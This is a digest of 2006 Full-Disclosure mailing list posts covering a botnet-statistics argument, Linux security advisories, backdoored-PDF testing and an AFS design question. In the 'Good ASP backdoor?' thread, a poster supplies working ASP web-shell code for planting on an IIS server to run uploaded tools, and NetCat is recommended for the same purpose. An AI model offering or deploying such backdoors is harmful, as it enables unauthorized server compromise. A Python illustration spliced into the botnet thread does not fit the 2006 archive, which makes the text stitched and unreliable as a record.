Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

2006-09-14 Thread Dude VanWinkle
On 9/15/06, Richard Golodner <[EMAIL PROTECTED]> wrote:
> As we have seen today everybody has an opinion about how the Botnet
> metrics are computed. I have been reading Gadi's posts for many years now and
> believe he is a very knowledgeable and competent person. Give the guy a
> break, he has supplied us with very useful and interesting facts on Botnets
> and that is a lot more than I see coming from all the rest of the group
> involved in this thread.
> Where is everyone else's data?

I have data collected over 5 class B's via darknet.


Of course they are all 10.1.x.x, with only 1 virtual host per /16.
Seems like I am guessing.

Not that I don't trust G, just wanted to see if I could goad him into
releasing some data (as has been called for).

-JP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

2006-09-14 Thread Richard Golodner
As we have seen today everybody has an opinion about how the Botnet
metrics are computed. I have been reading Gadi's posts for many years now and
believe he is a very knowledgeable and competent person. Give the guy a
break, he has supplied us with very useful and interesting facts on Botnets
and that is a lot more than I see coming from all the rest of the group
involved in this thread.
Where is everyone else's data?
Richard Golodner



[Full-disclosure] [SECURITY] [DSA 1160-2] New Mozilla packages fix several vulnerabilities

2006-09-14 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1160-2                      [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
September 15th, 2006                    http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package: mozilla
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE IDs: CVE-2006-2779 CVE-2006-3805 CVE-2006-3806 CVE-2006-3807
 CVE-2006-3808 CVE-2006-3809 CVE-2006-3810
CERT advisories: VU#466673 VU#655892 VU#687396 VU#876420 VU#911004
BugTraq IDs: 18228 19181

The latest security updates of Mozilla introduced a regression that
led to a dysfunctional attachment panel, which warrants a correction to
fix this issue.  For reference please find below the original advisory
text:

  Several security related problems have been discovered in Mozilla and
  derived products.  The Common Vulnerabilities and Exposures project
  identifies the following vulnerabilities:

  CVE-2006-2779

  Mozilla team members discovered several crashes during testing of
  the browser engine showing evidence of memory corruption which may
  also lead to the execution of arbitrary code.  The last bit of
  this problem will be corrected with the next update.  You can
  prevent any trouble by disabling Javascript.  [MFSA-2006-32]

  CVE-2006-3805

  The Javascript engine might allow remote attackers to execute
  arbitrary code.  [MFSA-2006-50]

  CVE-2006-3806

  Multiple integer overflows in the Javascript engine might allow
  remote attackers to execute arbitrary code.  [MFSA-2006-50]

  CVE-2006-3807

  Specially crafted Javascript allows remote attackers to execute
  arbitrary code.  [MFSA-2006-51]

  CVE-2006-3808

  Remote AutoConfig (PAC) servers could execute code with elevated
  privileges via a specially crafted PAC script.  [MFSA-2006-52]

  CVE-2006-3809

  Scripts with the UniversalBrowserRead privilege could gain
  UniversalXPConnect privileges and possibly execute code or obtain
  sensitive data.  [MFSA-2006-53]

  CVE-2006-3810

  A cross-site scripting vulnerability allows remote attackers to
  inject arbitrary web script or HTML.  [MFSA-2006-54]

For the stable distribution (sarge) these problems have been fixed in
version 1.7.8-1sarge7.2.2.

For the unstable distribution (sid) these problems won't be fixed
since its end of lifetime has been reached and the package will soon
be removed.

We recommend that you upgrade your mozilla package.


Upgrade Instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------


Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

2006-09-14 Thread Peter Dawson
I can't present data, but I'll opine that Gadi is pretty much on track with figures and numbers. In fact his stats are on the lower side.

Our current intel reports indicate overall incidents by "Zombie machines on organization's network / bots / use of network by BotNets" = 20%, which is ANY NET based data sets for incident mngt.

This indicates a 36% increase from July 2004 - June 2005 with a mean "unknown base" being equated to 15.1%. This percent implies the rate of fresh nodes being propagated, or rather the rate of growth for Botnets!!

Hypothetically, you can flatline these stats against whatever data sets you have... I'll leave you all to your better judgements :)-

/pd

[Full-disclosure] Re: Backdooring PDF Files

2006-09-14 Thread fit happy
It really takes effect in my virtual machine:
xp sp2 + pdf reader version 7.0.1.2005030700

Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

2006-09-14 Thread Gadi Evron
On Thu, 14 Sep 2006, Dude VanWinkle wrote:
> On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
> > This counts bot samples. Whether they are variants (changed) or
> > insignificant changes such as only the IP address to the C&C, they are
> > counted as unique.
> 
> So if you have multiple machines NAT'ed under one IP, that is one pot.
> err bot eh? OK.

And if I see 10 bots using the same address on a dynamic range.. ever heard
of DHCP? The number crunching schemes are never perfect but they are pretty
good.

I count, much like many others, unique IPs. A bot is defined as an
instance of an installed Trojan horse. One machine may have (and probably
does have) several. We can count IPs and we do.

3.5 million hosts, note, for spam alone. The total population count is
mind-boggling. I believe Spamhaus has it pinned at 3.2 million, others
have higher numbers. That's about where it is for EMAIL based spam, per
day.

> 
> >
> > This is why we now run different sharing projects between established
> > honey nets.
> 
> So you dont count botnets that detect honeynets eh?
> 

Honey pot detection is an interesting field, I am familiar with it and
even consider myself somewhat of a knowledgeable person on it, but there
are those who research it actively.

As interesting as it may be, it's not much of a field yet, sorry to
say. Honey pots of different kinds work marvelously.

Not all our sources for samples are the same. It would be silly of me to
divulge them all (especially as personally I have no use for samples these
days and others do). Still, we can only report what we see, what do you
see?

> > > or other trivial changes?  Do you attempt to correct for complex 
> > > polymorphic
> > > variants?
> 
> Nah, just contributors who don't all have publicly routable IPs and
> these herders that know about VMware/Honeywall
> 
> 
> > There aren't many of those.. really. :)
> 
> Really? Ok.
> 
> > > > Further, the anti virus world sees about the same numbers.
> 
> Using the same methods?
> 

And their reporting user-base, alliances and sharing partners, and what
not. Yes. Do you think all bots are extremely smart rootkits? I am
quite happy to say most botnets are nothing if not the re-use of old code,
which is freely available, using the same old methods.

There are other types of malware out there.

> > > > The Microsoft anti malware team (and Ziv Mador specifically) spoke of
> > > > 15K avg bot samples a month, as well.
> 
> Gotcha, you MS and Symantec share numbers based off who doesn't know how
> to disable your detection methods

You assume too much Dude.
Still, you are right, 100%. I can only detect what I know how to
detect. But samples are not the only way to follow botnets, and there are
many ends on how to approach one problem.

Cryptic? I suppose, but hey, Google for methods, see what you find, and
tell me what you think. I believe we have pretty good coverage, but I also
need to admit most anti viruses do not cover bot detection very well.

> I am just saying, the larger the organization, the sharper the focus
> from the other side. Maybe a loose coalition of known non-bullshitters
> would have a more accurate picture.

The picture you got is pretty accurate. Don't take my word for it
though. I am happy to examine and share (as much as I can, which is more
than enough to show the numbers (lower numbers) we chose to show in the
article.

What numbers do you need? What makes you doubt what we have given? I'd be
more than happy to answer any question you have or counter-numbers you
have, but your love for me is as irrelevant as you calling me a
*** when you don't show your own data or challenge mine with
actual questions like Dave (the other dave) did.

Thanks,

Gadi.

> still love ja tho Gadi,
> 
> -JP
> 
> > >
> > >   Got a link/quote/reference to that?  Does Ziv explain the methodology 
> > > that
> > > they are using?
> >
> > Nope, but I will ask. Most of the numbers I get are at 15K. I can only
> > prove *on my own* without relying on other sources, as reliable as they
> > may be, 12K, which is the number we mentioned in the article. We were
> > being conservative due to that reason, but the number is higher.
> >
> > > > I don't know what others may be seeing, but this is our best estimate
> > > > as to what's going on with the number of unique samples released
> > > > every month.
> > > >
> > > > Jose Nazario from Arbor replied on the botnets list that he sees
> > > > similar numbers.
> > > >
> > > > I hope this helps... what are you looking to hear?
> > >
> > >   Some kind of explanation for the huge disjunction between these numbers
> > > and our instinctive ideas about what's possible.  Of course, being
> >
> > I followed you this far, but to be honest, your ideas (what are
> > they?) are indeed very far from reality... :)
> >
> > > un-worked-out intuitive estimates, such ideas are of course entirely 
> > > likely
> > > to be off the mark, but off the mark by two orders of magnitude?  Hence

Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

2006-09-14 Thread Dude VanWinkle
On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
> This counts bot samples. Whether they are variants (changed) or
> insignificant changes such as only the IP address to the C&C, they are
> counted as unique.

So if you have multiple machines NAT'ed under one IP, that is one pot.
err bot eh? OK.

>
> This is why we now run different sharing projects between established
> honey nets.

So you don't count botnets that detect honeynets eh?

> > or other trivial changes?  Do you attempt to correct for complex polymorphic
> > variants?

Nah, just contributors who don't all have publicly routable IPs and
these herders that know about VMware/Honeywall


> There aren't many of those.. really. :)

Really? Ok.

> > > Further, the anti virus world sees about the same numbers.

Using the same methods?

> > > The Microsoft anti malware team (and Ziv Mador specifically) spoke of
> > > 15K avg bot samples a month, as well.

Gotcha, you MS and Symantec share numbers based off who doesn't know how
to disable your detection methods

I am just saying, the larger the organization, the sharper the focus
from the other side. Maybe a loose coalition of known non-bullshitters
would have a more accurate picture.

still love ja tho Gadi,

-JP

> >
> >   Got a link/quote/reference to that?  Does Ziv explain the methodology that
> > they are using?
>
> Nope, but I will ask. Most of the numbers I get are at 15K. I can only
> prove *on my own* without relying on other sources, as reliable as they
> may be, 12K, which is the number we mentioned in the article. We were
> being conservative due to that reason, but the number is higher.
>
> > > I don't know what others may be seeing, but this is our best estimate
> > > as to what's going on with the number of unique samples released
> > > every month.
> > >
> > > Jose Nazario from Arbor replied on the botnets list that he sees
> > > similar numbers.
> > >
> > > I hope this helps... what are you looking to hear?
> >
> >   Some kind of explanation for the huge disjunction between these numbers
> > and our instinctive ideas about what's possible.  Of course, being
>
> I followed you this far, but to be honest, your ideas (what are
> they?) are indeed very far from reality... :)
>
> > un-worked-out intuitive estimates, such ideas are of course entirely likely
> > to be off the mark, but off the mark by two orders of magnitude?  Hence the
> > request for more methodological details.
>
> No problem, I quite understand. There is not that much science into it
> really:
> "Yo, how many unique samples do you see?" as a lone dataset if they won't
> share.
> "Yo, how many unique samples do we all see?" if they share.
> "Yo, how many unique samples do others see?"
>
> AVG is 15K, I can prove *on my own* 12K... counting banking/phishing
> trojan horses, general purpose trojans, dialers, etc (from the large bot
> families).
>
> Gadi.
>
>
> >
> > cheers,
> >   DaveK
> > --
> > Can't think of a witty .sigline today
> >
> >
> >
> > ___
> > To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> > All list and server information are public and available to law enforcement 
> > upon request.
> > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
> >
>
>



Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

2006-09-14 Thread Dude VanWinkle
On 9/14/06, Jose Nazario <[EMAIL PROTECTED]> wrote:
> i guess i'm curious about your position, then, and what you're meaning by
> "our instinctive ideas about what's possible".


You see, the universe operates with a distinct prejudice towards
individuals with an inclination towards lunacy...

they should have covered this in douchebaggery 101 f'er cryin' out loud!

-JP



Re: [Full-disclosure] Good ASP backdoor?

2006-09-14 Thread c0ntex
Nothing spiffing but it works,

<%@ Page language="VB" Debug="true" aspcompat="true" %>
<%
shell("C:\Program Files\WebApp\Uploads\owned.bat")
%>

   Sub blah()
   Dim SpawnShell = server.CreateObject("WScript.Shell")
   SpawnShell.Run("C:\Program Files\WebApp\Uploads\owned.bat")
   End sub



then just upload your tools and run via the bat file.  Does the job.


On 14/09/06, Jason Miller <[EMAIL PROTECTED]> wrote:
> http://replica-solutions.de/
> has some php based ones, check it out
>
> On 9/14/06, Exibar < [EMAIL PROTECTED]> wrote:
> > NetCat is a tried and true favorite
> >
> >
> > - Original Message -
> > From: "Lachniet, Mark" <[EMAIL PROTECTED]>
> > To: 
> > Sent: Thursday, September 14, 2006 2:44 PM
> > Subject: [Full-disclosure] Good ASP backdoor?
> >
> >
> > > Can anyone suggest a good backdoor for placing on a IIS server when you
> > > can upload a file to document root?  For example an all-in-one tool with
> > > upload, download, command execution, etc.  There are several basic ones
> > > out there - I was wondering if anyone ever wrote a really spiffy one.
> > >
> > > Thanks in advance,
> > >
> > > Mark Lachniet
> > >
> > >
> > >
> >
> >
>
>
>
>


-- 

regards
c0ntex



Re: [Full-disclosure] Good ASP backdoor?

2006-09-14 Thread Jason Miller
http://replica-solutions.de/
has some php based ones, check it out

On 9/14/06, Exibar <[EMAIL PROTECTED]> wrote:
> NetCat is a tried and true favorite
>
> - Original Message -
> From: "Lachniet, Mark" <[EMAIL PROTECTED]>
> To:
> Sent: Thursday, September 14, 2006 2:44 PM
> Subject: [Full-disclosure] Good ASP backdoor?
>
> > Can anyone suggest a good backdoor for placing on a IIS server when you
> > can upload a file to document root?  For example an all-in-one tool with
> > upload, download, command execution, etc.  There are several basic ones
> > out there - I was wondering if anyone ever wrote a really spiffy one.
> >
> > Thanks in advance,
> >
> > Mark Lachniet


Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

2006-09-14 Thread Jose Nazario
On Thu, 14 Sep 2006, Dave "No, not that one" Korn wrote:

> Can you go into detail about the methodology you're using here?  How do 
> you "get to a number" of 15,000 from a number "between 200 and 800"? 
> Is this a statistical extrapolation, or are you saying that your 
> honeynet gets 200 to 800 unique samples a month, and so does that one 
> over there, and that one, and that one and they all add up to 15000? 
> Do you attempt to correct for variants that are simply re-packed using a 
> different compressor, or other trivial changes?  Do you attempt to 
> correct for complex polymorphic variants?

my numbers are based on unique MD5 values.

the bulk of those are minor variants on a theme, ie repackaged bots or 
reconfigured bots, maybe a new module thrown in or something. only a small 
handful, maybe a dozen or so, are really new bots every month. very rarely 
do we see new bots or new capabilities added. the last major change was 
the use of the MS06-040 netapi exploit.

the bulk of the bot binaries i see are derivatives of well known families. 
very few new families emerge in any given timeframe, but in the HTTP bot
world, we're starting to see people develop tools and reuse them.

unique bot samples, ~12-15k or higher a month. many independent teams can 
back that ballpark figure up. new bot samples, truly new like i outlined 
above, is far less. about three orders of magnitude less.

by the way, in this day and age the bulk of people do not bother with 
polymorphism. they achieve it not through the classic - and elegant - 
methods of self modifying code but instead by churning out new bots fast 
and furious. same end result, though: confuse the naive, static detection 
tools out there.

> Some kind of explanation for the huge disjunction between these numbers 
> and our instinctive ideas about what's possible.  Of course, being 
> un-worked-out intuitive estimates, such ideas are of course entirely 
> likely to be off the mark, but off the mark by two orders of magnitude? 
> Hence the request for more methodological details.

i guess i'm curious about your position, then, and what you're meaning by 
"our instinctive ideas about what's possible".

it sounds like we're on the same page, but you may feel it's hyping the 
problem to talk about new bots based on unique MD5 values. it's not my 
favorite way of thinking about it, but it is easily underscored by a 
real-world fact: many AV vendors fail to detect the same bot source simply 
repackaged or re-configured (ie a new IRC server, everything else the 
same). hence, each new MD5 means a new detection hit for them. so, hype 
has a real-world backing, namely AV detection issues.


jose nazario, ph.d. [EMAIL PROTECTED]
http://monkey.org/~jose/
http://monkey.org/~jose/secnews.html
http://www.wormblog.com/



Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

2006-09-14 Thread Gadi Evron
On Thu, 14 Sep 2006, Dave "No, not that one" Korn wrote:
>   Can you go into detail about the methodology you're using here?  How do 
> you "get to a number" of 15,000 from a number "between 200 and 800"?  Is 

My comment here was in regard to what most honey nets see.

> this a statistical extrapolation, or are you saying that your honeynet gets 
> 200 to 800 unique samples a month, and so does that one over there, and that 
> one, and that one and they all add up to 15000?  Do you attempt to 

Yes. Also, some are large enough to get to that number, and there are
other sources as well such as the AV community or the Microsoft data... as
examples.

> correct for variants that are simply re-packed using a different compressor, 

This counts bot samples. Whether they are variants (changed) or
insignificant changes such as only the IP address to the C&C, they are
counted as unique.

This is why we now run different sharing projects between established
honey nets.

> or other trivial changes?  Do you attempt to correct for complex polymorphic 
> variants?

There aren't many of those.. really. :)


> > Further, the anti virus world sees about the same numbers.
> >
> > The Microsoft anti malware team (and Ziv Mador specifically) spoke of
> > 15K avg bot samples a month, as well.
> 
>   Got a link/quote/reference to that?  Does Ziv explain the methodology that 
> they are using?

Nope, but I will ask. Most of the numbers I get are at 15K. I can only
prove *on my own* without relying on other sources, as reliable as they
may be, 12K, which is the number we mentioned in the article. We were
being conservative due to that reason, but the number is higher.

> > I don't know what others may be seeing, but this is our best estimate
> > as to what's going on with the number of unique samples released
> > every month.
> >
> > Jose Nazario from Arbor replied on the botnets list that he sees
> > similar numbers.
> >
> > I hope this helps... what are you looking to hear?
> 
>   Some kind of explanation for the huge disjunction between these numbers 
> and our instinctive ideas about what's possible.  Of course, being 

I followed you this far, but to be honest, your ideas (what are
they?) are indeed very far from reality... :)

> un-worked-out intuitive estimates, such ideas are of course entirely likely 
> to be off the mark, but off the mark by two orders of magnitude?  Hence the 
> request for more methodological details.

No problem, I quite understand. There is not that much science into it
really:
"Yo, how many unique samples do you see?" as a lone dataset if they won't
share.
"Yo, how many unique samples do we all see?" if they share.
"Yo, how many unique samples do others see?"

AVG is 15K, I can prove *on my own* 12K... counting banking/phishing
trojan horses, general purpose trojans, dialers, etc (from the large bot
families).

Gadi.


> 
> cheers,
>   DaveK
> -- 
> Can't think of a witty .sigline today 
> 
> 
> 
> 

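As an added illustration of the counting question in this thread (not code from any of the posters), the following Python toy compares the three ways of counting that Jose and Gadi describe: per-honeynet unique MD5s summed naively ("they all add up"), unique MD5s once the honeynets pool what they see, and unique samples once the C&C configuration is stripped so a reconfigured copy of the same code hashes identically. The sample "binaries", the honeynet names, the example C&C addresses and the strip_config normalisation are all constructed for this example.

```python
import hashlib
from collections import defaultdict

# Constructed toy "bot binaries": a fixed code body per family plus one config
# line naming the C&C server. Real bots are not this simple; the layout only
# mimics the repackaged / reconfigured copies the thread describes.
FAMILY_A = b"FAMILY-A-CODE:" + b"\x90" * 32
FAMILY_B = b"FAMILY-B-CODE:" + b"\xcc" * 32


def build_sample(code: bytes, c2: str) -> bytes:
    """Assemble a toy sample: code body followed by a C2= config line."""
    return code + b"\nC2=" + c2.encode() + b"\n"


# Constructed feed of (honeynet, sample bytes) as three honeynets might report it.
FEED = [
    ("honeynet-1", build_sample(FAMILY_A, "irc.example.net:6667")),
    ("honeynet-1", build_sample(FAMILY_A, "irc2.example.net:6667")),
    ("honeynet-2", build_sample(FAMILY_A, "irc.example.net:6667")),  # byte-identical to the first
    ("honeynet-2", build_sample(FAMILY_B, "203.0.113.5:6667")),
    ("honeynet-3", build_sample(FAMILY_B, "203.0.113.6:6667")),
    ("honeynet-3", build_sample(FAMILY_A, "irc3.example.net:6667")),
]


def md5_hex(data: bytes) -> str:
    """Unique-MD5 counting is what Jose's numbers are based on."""
    return hashlib.md5(data).hexdigest()


def strip_config(data: bytes) -> bytes:
    """Hypothetical normalisation: drop the C2= line so a reconfigured copy of
    the same code hashes identically. In a real pipeline this step would be
    unpacking plus config extraction, which is far more work than shown here."""
    return b"\n".join(line for line in data.split(b"\n") if not line.startswith(b"C2="))


def per_source_unique(feed) -> dict:
    """Unique MD5s each honeynet would report on its own."""
    seen = defaultdict(set)
    for source, data in feed:
        seen[source].add(md5_hex(data))
    return {source: len(hashes) for source, hashes in seen.items()}


def naive_total(feed) -> int:
    """Summing per-honeynet counts double-counts samples several honeynets caught."""
    return sum(per_source_unique(feed).values())


def shared_unique(feed) -> int:
    """Unique MD5s once the honeynets pool their samples ('how many do we all see')."""
    return len({md5_hex(data) for _, data in feed})


def distinct_code(feed) -> int:
    """Unique samples after removing the C&C config: the 'truly new' count."""
    return len({md5_hex(strip_config(data)) for _, data in feed})


def summarise(feed) -> dict:
    """All four views of the same feed side by side."""
    return {
        "per_source": per_source_unique(feed),
        "naive_total": naive_total(feed),
        "shared_unique": shared_unique(feed),
        "distinct_code": distinct_code(feed),
    }


if __name__ == "__main__":
    for key, value in summarise(FEED).items():
        print(f"{key}: {value}")
```

On this constructed feed the naive sum is 6, pooling brings it to 5, and stripping the C&C config leaves only 2 distinct code bodies, the same gap between "unique MD5s" and "new bots" that Jose describes, in miniature.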


Re: [Full-disclosure] Backdooring PDF Files

2006-09-14 Thread Stan Bubrouski
On 9/14/06, Hugo Francisco González Robledo <[EMAIL PROTECTED]> wrote:
> I think it depends on the context.
>
> Example 1 (backdoored1.pdf) :
>
> On Ubuntu Linux with Adobe Reader 7.0.1 opens the web page on
> mozilla-firefox without warning.
>

On FC5 with Acrobat Reader 7.0.8 it opens the page in firefox without
warning as well.

-sb



[Full-disclosure] AFS - The Ultimate Solution?

2006-09-14 Thread Paul Sebastian Ziegler
Hi list,

recently I found myself in an argument which I found interesting. This
is why I want to pass it on to the list, since neither my friend nor I
was able to agree on this. Maybe the broader knowledge of this list
will lighten up the matter a bit. Apart from this I think it might
interest many of you.

The core of the discussion is a corporate system with several workstations
all attached to a single network. This network runs an AFS server which
supplies the corporation's AFS cell.
Every workstation boots into a minimal environment which asks for a
username and password. It then uses these to connect to the
AFS cell and boots one of several available system images which reside
on the AFS server. (Both Linux (FC1) and Windows (2000) images are
available.) After booting the OS, several important folders and files are
replaced with the user's own data (which only he can access, due to
Kerberos authentication). For instance, the Linux image gets /etc/passwd,
/etc/shadow, /home/$USER and some others replaced. The custom
/etc/passwd and /etc/shadow will only contain the user himself and the
root account, in order to prevent brute-forcing of the passwords.

It seems like this system is quite secure. Even if an attacker should
gain root access locally, he would not be able to access anything he
didn't own in the first place (that is, other users' files residing in
their private AFS folders). Also he could cause no damage to the
system, because the system is booted from the same image every time. Even
if he did something like rm -rf /, he would only delete his private files
in the home folder.

This is kind of a combination of RemoteBoot and AFS.

The well-known weakness of RemoteBoot is that, if the communication
with the image server is not encrypted, it is possible
to supply forged images to the workstation (e.g. by ARP-spoofing the
image server).
AFS however uses Kerberos to authenticate and thus is considered secure.

Now my friend claims that this system could go unmanaged for ages, since
the user's data would remain secure even if security holes were
published and exploits released. This seems true.
However, I kind of refuse to believe that something this simple can truly
be secure.

The only hole I could come up with is a remote
vulnerability which an attacker could use to access the running
workstation of somebody else.
However, this seems unlikely and quite lame.

Anyone up for anything more sophisticated?

Thanks in advance and happy arguing.

Paul



Re: [Full-disclosure] Good ASP backdoor?

2006-09-14 Thread Exibar
NetCat is a tried and true favorite


- Original Message - 
From: "Lachniet, Mark" <[EMAIL PROTECTED]>
To: 
Sent: Thursday, September 14, 2006 2:44 PM
Subject: [Full-disclosure] Good ASP backdoor?


> Can anyone suggest a good backdoor for placing on an IIS server when you
> can upload a file to document root?  For example an all-in-one tool with
> upload, download, command execution, etc.  There are several basic ones
> out there - I was wondering if anyone ever wrote a really spiffy one.
> 
> Thanks in advance,
> 
> Mark Lachniet
> 



[Full-disclosure] [USN-346-2] Fixed linux-restricted-modules-2.6.15 for previous Linux kernel update

2006-09-14 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-346-2 September 14, 2006
linux-restricted-modules-2.6.15 regression fix
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  avm-fritz-firmware-2.6.15-26                        2.6.15.11-4
  avm-fritz-kernel-source                             2.6.15.11-4
  fglrx-control                                       2.6.15.11-4
  fglrx-kernel-source                                 2.6.15.11-4
  linux-restricted-modules-2.6.15-26-386              2.6.15.11-4
  linux-restricted-modules-2.6.15-26-686              2.6.15.11-4
  linux-restricted-modules-2.6.15-26-amd64-generic    2.6.15.11-4
  linux-restricted-modules-2.6.15-26-amd64-k8         2.6.15.11-4
  linux-restricted-modules-2.6.15-26-amd64-xeon       2.6.15.11-4
  nic-restricted-firmware-2.6.15-26-386-di            2.6.15.11-4
  nic-restricted-firmware-2.6.15-26-amd64-generic-di  2.6.15.11-4
  nic-restricted-modules-2.6.15-26-386-di             2.6.15.11-4
  nic-restricted-modules-2.6.15-26-amd64-generic-di   2.6.15.11-4
  nvidia-glx                                          2.6.15.11-4
  nvidia-glx-dev                                      2.6.15.11-4
  nvidia-glx-legacy                                   2.6.15.11-4
  nvidia-glx-legacy-dev                               2.6.15.11-4
  nvidia-kernel-source                                2.6.15.11-4
  nvidia-legacy-kernel-source                         2.6.15.11-4
  xorg-driver-fglrx                                   2.6.15.11-4
  xorg-driver-fglrx-dev                               2.6.15.11-4

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

Details follow:

USN-346-1 provided an updated Linux kernel to fix several security
vulnerabilities. Unfortunately the update broke the binary 'nvidia'
driver from linux-restricted-modules. This update corrects this
problem. We apologize for the inconvenience.


Updated packages for Ubuntu 6.06 LTS:


[Full-disclosure] Good ASP backdoor?

2006-09-14 Thread Lachniet, Mark
Can anyone suggest a good backdoor for placing on an IIS server when you
can upload a file to document root?  For example an all-in-one tool with
upload, download, command execution, etc.  There are several basic ones
out there - I was wondering if anyone ever wrote a really spiffy one.

Thanks in advance,

Mark Lachniet



Re: [Full-disclosure] Backdooring PDF Files

2006-09-14 Thread Hugo Francisco González Robledo
I think it depends on the context.

Example 1 (backdoored1.pdf) :

On Ubuntu Linux with Adobe Reader 7.0.1 it opens the web page in
mozilla-firefox without warning.

On Windows XP SP2 with Adobe Reader 7.0.8 it shows a warning about opening
the URL.

Example 2 (backdoored2.pdf) :

On Ubuntu Linux and Windows XP SP2 it apparently does nothing.

So it could be possible to make multi-target attacks :)

but in other viewers like evince or xpdf it has no effect :( 

Regards!

On Wed, Sep 13, 2006 at 11:06:55PM +0300, Juha-Matti Laurio wrote:
> Proof of Concept for example 1 (backdoored1.pdf) opened with Adobe Reader 
> 7.0.8
> (i.e. no browser plug-in used) issued a Security Warning dialog box:
> 
> "The document is trying to connect to the site:
> http://www.google.com/owned.html
> 
> If you trust the site click "Allow", otherwise click "Block"."
> 
> Option Remember my action is in use as well.
> 
> When clicking "Allow" this Google page was opened in MSIE (in fact FF is my 
> default browser, however).
> 
> Am I missing something related to differences between Reader plug-in and 
> Reader application?
> 
> - Juha-Matti
> 
> 
> David Kierznowski <[EMAIL PROTECTED]> wrote: 
> >
> >Recently, there has been a lot of hype involving backdooring various
> >web technologies. pdp (architect) has done a lot of work centered around
> >this area.
> >
> >I saw Jeremiah Grossman mention PDF's being "BAD", however, I was
> >unable to easily locate any practical reasons as to why. I decided to
> >investigate this a little further.
> >
> >This article discusses two possible backdoor techniques for Adobe
> >Acrobat Reader and Professional. It includes proof of concept code and
> >backdoored PDF documents.
> >
> >The article can be found here:
> >http://michaeldaw.org/
> >

-- 
Hugo Francisco González Robledo
Instituto Tecnológico de San Luis Potosí

Public key at http://www.honeynet.org.mx
Public key at http://ardilla.zapto.org

Ask Google-Earth where I am:
http://ardilla.zapto.org/ubicaHugo.kml

---
Education is what remains after one has forgotten
what one learned in school.
Albert Einstein
---



Re: [Full-disclosure] the world of botnets article and wrong numbers

2006-09-14 Thread Dave "No, not that one" Korn
Gadi Evron wrote:

> Numbers...
> I can't speak for others, but I can try to answer better than I did
> on the botnets mailing list on whitestar.
>
> On individual honey nets, even rather large ones, the number of unique
> samples often assembled can be somewhere between 200 and 800
> a month.. depending on how wide it is spread and the networks it sits
> on. Which is why many of us cooperate.
>
> From cumulative honey nets monitoring of such smaller (yet very
> effective) nets, and some larger nets, we get to a number of about
> 15K new bot samples every month (Alan Solomon and myself wrote 12K,
> so we underplayed it a bit due to statistics being a bit shaky). So
> the real avg number is somewhere around 15K new unique samples a
> month.

  Can you go into detail about the methodology you're using here?  How do 
you "get to a number" of 15,000 from a number "between 200 and 800"?  Is 
this a statistical extrapolation, or are you saying that your honeynet gets 
200 to 800 unique samples a month, and so does that one over there, and that 
one, and that one and they all add up to 15000?  Do you attempt to 
correct for variants that are simply re-packed using a different compressor, 
or other trivial changes?  Do you attempt to correct for complex polymorphic 
variants?

> Further, the anti virus world sees about the same numbers.
>
> The Microsoft anti malware team (and Ziv Mador specifically) spoke of
> 15K avg bot samples a month, as well.

  Got a link/quote/reference to that?  Does Ziv explain the methodology that 
they are using?

> I don't know what others may be seeing, but this is our best estimate
> as to what's going on with the number of unique samples released
> every month.
>
> Jose Nazarijo from Arbor replied on the botnets list that he sees
> similar numbers.
>
> I hope this helps... what are you looking to hear?

  Some kind of explanation for the huge disjunction between these numbers 
and our instinctive ideas about what's possible.  Of course, being 
un-worked-out intuitive estimates, such ideas are entirely likely 
to be off the mark, but off the mark by two orders of magnitude?  Hence the 
request for more methodological details.

cheers,
  DaveK
-- 
Can't think of a witty .sigline today 





[Full-disclosure] [ GLSA 200609-10 ] DokuWiki: Arbitrary command execution

2006-09-14 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200609-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: DokuWiki: Arbitrary command execution
  Date: September 14, 2006
  Bugs: #146800
ID: 200609-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Vulnerabilities in some accessory scripts of DokuWiki allow remote code
execution.

Background
==

DokuWiki is a wiki targeted at developer teams, workgroups and small
companies. It does not use a database backend.

Affected packages
=

-------------------------------------------------------------------
     Package                      /  Vulnerable  /     Unaffected
-------------------------------------------------------------------
  1  www-apps/dokuwiki                < 20060309d     >= 20060309d

Description
===

"rgod" discovered that DokuWiki doesn't sanitize the X-FORWARDED-FOR
HTTP header, allowing the injection of arbitrary contents - such as PHP
commands - into a file. Additionally, the accessory scripts installed
in the "bin" DokuWiki directory are vulnerable to directory traversal
attacks, allowing to copy and execute the previously injected code.

Impact
==

A remote attacker may execute arbitrary PHP (and thus probably system)
commands with the permissions of the user running the process serving
DokuWiki pages.

Workaround
==

Disable remote access to the "bin" subdirectory of the DokuWiki
